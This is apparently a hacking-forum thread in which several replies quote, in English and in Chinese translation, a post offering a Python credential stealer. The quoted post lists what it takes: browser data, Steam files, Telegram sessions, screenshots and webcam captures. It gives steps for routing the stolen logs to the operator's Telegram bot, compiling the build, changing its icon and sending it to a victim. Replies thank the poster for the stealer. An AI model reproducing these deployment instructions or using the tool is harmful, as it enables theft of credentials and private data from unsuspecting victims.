This post is by a banned member (qwerty77743) - Unhide
29 December, 2024 - 10:31 PM
Reply
This post is by a banned member (jouqras13) - Unhide
29 December, 2024 - 10:44 PM
Reply
(06 February, 2024 - 03:37 PM)Scared Wrote: Show MoreHere is a simple stealer written in python
I recommend always running this type of program under a virtual/rdp machine, be careful !
Download link :
Features :
- Browsers (firefox,chrome,opera)
- Steam Files
- System Info
- Screenshot/Webcam
- Telegram Session
All logs will be sent to your telegram bot
Tutorial :
1) Create a telegram bot and launch it, send it any message ( https://t.me/BotFather )
2) Copy the bot token (After creating the bot, the botfather will issue a token )
3) Paste the token between the quotes in the main.py file ( TOKEN = "YOUR token ")
4) Get the chat ID of your telegram account from the bot ( https://t.me/getidsbot )
5) Insert the chat ID between the quotes in the main.py file (CHAT_ID = "YOUR CHAT ID")
6 ) Run Compile.bat
After these steps, a stealer build will appear in the dist folder, which can be sent to the victim.
To change the icon, simply replace the icon.ico file with your icon with the same name
Known Error :
If you have problems with the cv2 module, then follow these steps:
1. Option - solve the problem yourself via Google
2. Option - delete these lines in the main.py file :
from modules.system import webcam
webcam.Selfie()
Then delete the webcam file. py in the modules/system folder
If during compilation there is an error like this:
The 'typing' package is an obsolete backport of a standard library package and is incompatible with PyInstaller. Please pip uninstall typing then try again.
The specified file cannot be found.
The specified file cannot be found.
To continue, press any key. . .
Then enter into the console: pip uninstall typing and then enter “y”
thx for stealer
This post is by a banned member (shrsb1234) - Unhide
02 January, 2025 - 05:17 PM
Reply
(06 February, 2024 - 03:37 PM)Scared Wrote: Show More这是一个用 python
![[Image: wut.png]](https://external-content.duckduckgo.com/iu/?u=https%3A%2F%2Fstatic.cracked.sh%2Fimages%2Fsmilies%2Fwut.png) 编写的简单窃取程序, 我建议始终在虚拟/rdp 机器下运行此类程序,小心!
下载链接:
功能:
- B浏览器(firefox,chrome,opera)
- Steam文件
- 系统信息
- 屏幕截图/网络摄像头- Telegram会话
所有日志都将发送到您的电报机器人
教程 :
1) 创建一个电报机器人并启动它,向它发送任何消息 ( https://t.me/BotFather )
2) 复制机器人令牌 (创建机器人后,机器人父亲将颁发令牌 )
3) 将令牌粘贴到 main.py 文件中的引号之间 ( TOKEN = “YOUR token ”)
4) 从机器人处获取你的电报账户的聊天 ID ( https://t.me/getidsbot )
5) 将聊天 ID 插入 main.py 文件中的引号之间 (CHAT_ID = “YOUR CHAT ID”)
6 ) 运行 Compile.bat
完成这些步骤后,dist 文件夹中会出现一个窃取程序版本,可以发送给受害者。
要更改图标,只需将 icon.ico 文件替换为同名
的图标 已知错误 :
如果您对 cv2 模块有问题,请按照以下步骤操作:
1. 选项 - 通过 Google
2 自己解决问题。选项 - 删除 main.py 文件中的这些行 :
from modules.system import webcam
webcam.selfie()
然后删除网络摄像头文件。modules / system 文件夹中
的 py 如果在编译过程中出现如下错误:
'typing' 包是标准库包的过时向后移植,与 PyInstaller 不兼容。请 pip 卸载键入,然后重试。
找不到指定的文件。
找不到指定的文件。
要继续,请按任意键。 . .
然后进入控制台:pip uninstall typing 然后输入“y”
[font]阿斯达斯德SDA[/font]
This post is by a banned member (K8ZEE) - Unhide
02 January, 2025 - 07:48 PM
Reply
(06 February, 2024 - 03:37 PM)Scared Wrote: Show MoreHere is a simple stealer written in python
I recommend always running this type of program under a virtual/rdp machine, be careful !
Download link :
Features :
- Browsers (firefox,chrome,opera)
- Steam Files
- System Info
- Screenshot/Webcam
- Telegram Session
All logs will be sent to your telegram bot
Tutorial :
1) Create a telegram bot and launch it, send it any message ( https://t.me/BotFather )
2) Copy the bot token (After creating the bot, the botfather will issue a token )
3) Paste the token between the quotes in the main.py file ( TOKEN = "YOUR token ")
4) Get the chat ID of your telegram account from the bot ( https://t.me/getidsbot )
5) Insert the chat ID between the quotes in the main.py file (CHAT_ID = "YOUR CHAT ID")
6 ) Run Compile.bat
After these steps, a stealer build will appear in the dist folder, which can be sent to the victim.
To change the icon, simply replace the icon.ico file with your icon with the same name
Known Error :
If you have problems with the cv2 module, then follow these steps:
1. Option - solve the problem yourself via Google
2. Option - delete these lines in the main.py file :
from modules.system import webcam
webcam.Selfie()
Then delete the webcam file. py in the modules/system folder
If during compilation there is an error like this:
The 'typing' package is an obsolete backport of a standard library package and is incompatible with PyInstaller. Please pip uninstall typing then try again.
The specified file cannot be found.
The specified file cannot be found.
To continue, press any key. . .
Then enter into the console: pip uninstall typing and then enter “y” ty
This post is by a banned member (Lmaophile) - Unhide
04 January, 2025 - 01:16 PM
Reply
|